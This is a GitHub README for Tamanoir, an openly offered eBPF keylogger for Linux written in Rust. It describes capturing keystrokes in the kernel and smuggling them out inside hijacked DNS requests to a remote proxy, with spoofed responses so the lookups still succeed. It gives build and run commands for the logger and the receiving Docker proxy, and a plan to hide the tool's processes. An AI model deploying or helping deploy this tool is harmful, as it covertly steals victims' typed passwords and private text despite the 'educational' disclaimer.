https://github.com/pythops/tamanoir

A KeyLogger using eBPF 🐝
aya ebpf hacking keylogger linux rust security

Tamanoir
A KeyLogger using eBPF 🐝





A large anteater of Central and South America, Myrmecophaga tridactyla


## 💡 Overview



1. Capture keystrokes and store them in a queue in the kernel.
2. Intercept DNS requests and inject the captured keystrokes in the DNS payload, then redirect the request to the designated remote server acting as a DNS proxy.
3. On the remote server, extract the keys from the DNS payload and send a valid DNS response.
4. Intercept the response and modify its source address so the initial request will complete successfully.


## 🚀 Setup

You need a Linux-based OS.

### ⚒️ Build from source

To build from source, make sure you have:

- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.
- [Rust](https://www.rust-lang.org/tools/install) installed with the `nightly` toolchain.

#### 1. Build eBPF program

```
cd tamanoir-ebpf
cargo build --release
```

#### 2. Build user space program

```
cargo build --release
```

This will produce an executable file at `target/release/tamanoir` that you can copy to a directory in your `$PATH`.

### 📥 Binary release

You can download the pre-built binaries from the [release page](https://github.com/pythops/tamanoir/releases).


## 🪄 Usage

### Tamanoir

```
RUST_LOG=info sudo -E tamanoir \
--proxy-ip \
--hijack-ip \
--layout \
--iface
```

For example:

```
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.75 \
--hijack-ip 8.8.8.8 \
--layout 0 \
--iface wlan0
```

Currently, there are two supported keyboard layouts:

`0` : qwerty (us)

`1` : azerty (fr)


### DNS Proxy

On a remote host, make sure you have [docker](https://docs.docker.com/engine/install/) installed.

#### 1. Build proxy image

```
cd proxy
docker build -t proxy .
```

#### 2. Run proxy

> [!NOTE]
> Make sure port 53 is available

```
docker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy
```


## πŸ› οΈTODO

- [ ] Automatic discovery of the configured local dns server
- [ ] Automatic discovery of the keyboard layout
- [ ] Rewrite the DNS proxy in Rust
- [ ] Make `Tamanoir` stealth (hide used ebpf maps and programs, process pid ...)


## ⚠️ Disclaimer

`Tamanoir` is developed for educational purposes only.


## ✍️ Authors

[Badr Badri](https://github.com/pythops)

[Adrien Gaultier](https://github.com/adgaultier)


## βš–οΈ License

GPLv3